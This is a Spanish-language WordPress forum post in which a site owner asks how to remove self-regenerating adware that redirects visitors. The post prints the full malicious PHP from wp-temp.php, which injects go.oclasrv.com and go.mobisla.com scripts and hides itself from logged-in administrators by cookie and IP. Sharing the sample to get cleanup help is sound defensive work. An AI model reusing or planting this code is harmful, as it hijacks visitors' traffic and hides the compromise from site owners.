Como Eliminar malware » go.oclasrv.com» por completo
-
Saludos.
El enlace en referencia es un sitio de pruebas y producción.Quiero decirles que llevo un par de meses luchando contra este Adware Malware, virus o como quieran llamarle.
Se trata de un codgio que se auto regenera mediante 2 archivos .php, este es el sript.<script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1527634"></script>
Ahora bien sabemos que la vulnerabilidad pudo ser detecta en algun plugin o falsa actualización descargada e instalada en e sitio, pero lo mas cumbre del caso es que todos las web alojadas fueron infectadas.
Este adware malware o como se le llame es un ladron de trafico, y mientras estas logueado como administrador nunca va a hacerce notar, una vez cierras la sesion y limpias la cache del navegador comienza a trabajar en tu web en cada click de enlace redirige a otros sitios sin relevancia ( porno, casinos, software basura, apuestas y pare de contar)
Donde se aloja? hasta ahora lo he detecta en la carpeta wp-include y son dos archivos php. wp-feed.php y wp-temp.php, estos archivos por mas que se borran vuelven a regenerarce, al escanear el sitio con Wordfence el los elimina y los pocos minutos estan regenerados nuevamente infectando el sitio.
Aqui les dejo el codigo de ambos.
wp-temp.phpini_set('display_errors', 0); error_reporting(0); $wp_auth_key='08b370e35d008b6591dd40b0eec23025'; if ( ! function_exists( 'slider_option' ) ) { function slider_option($content){ if(is_single()) { $con = ' '; $con2 = ' <script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1527634"></script> <script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1527635&interactive=1&pushup=1"></script> '; $content=$content.$con2; } return $content; } function slider_option_footer(){ if(!is_single()) { $con2 = ' <script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1527634"></script> <script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1527635&interactive=1&pushup=1"></script> '; echo $con2; } } function setting_my_first_cookie() { setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN); } if(is_user_logged_in()) { add_action( 'init', 'setting_my_first_cookie',1 ); } if( current_user_can('edit_others_pages')) { if (file_exists(ABSPATH.'wp-includes/wp-feed.php')) { $ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php'); } if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false) { $ip.=$_SERVER['REMOTE_ADDR'].' '; @file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip); } } $ref = $_SERVER['HTTP_REFERER']; $SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com'); foreach ($SE as $source) { if (strpos($ref,$source)!==false) { setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); $sevisitor=true; } } if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in()) { $adtxt=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php'); if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false) { add_filter('the_content','slider_option'); add_action('wp_footer','slider_option_footer'); if($sevisitor==true || isset($_COOKIE['sevisitor'])) { } } } }
Y el archivo wp-tem.php solo esta escrita la ip desde donde conecto a mi sitios wordpress.
Como bien lo he mencionado, he hecho todo lo recomendado, nuevas instalaciones de wp, eliminación de y re instalación de plugin, he saneado según lo remendado en este foro de soporte… y nada!! ha Cambie de host, y los problemas continúan.
Si alguno de vosotros habéis tenido este malware y lo ha solucionado, mucho le sabría agradecer, ya tengo muchos problemas tratando de recuperar el sitio y algunos de clientes y esto me tiene muy agotado.
Agradeciendo su atención y colaboraciones al caso.
Quedo atento de vuestros comentarios y agradeciendo la ayuda que me puedan prestar en este caso.
Un saludo.
La página con la que necesito ayuda: [accede para ver el enlace]
- El debate ‘Como Eliminar malware » go.oclasrv.com» por completo’ está cerrado a nuevas respuestas.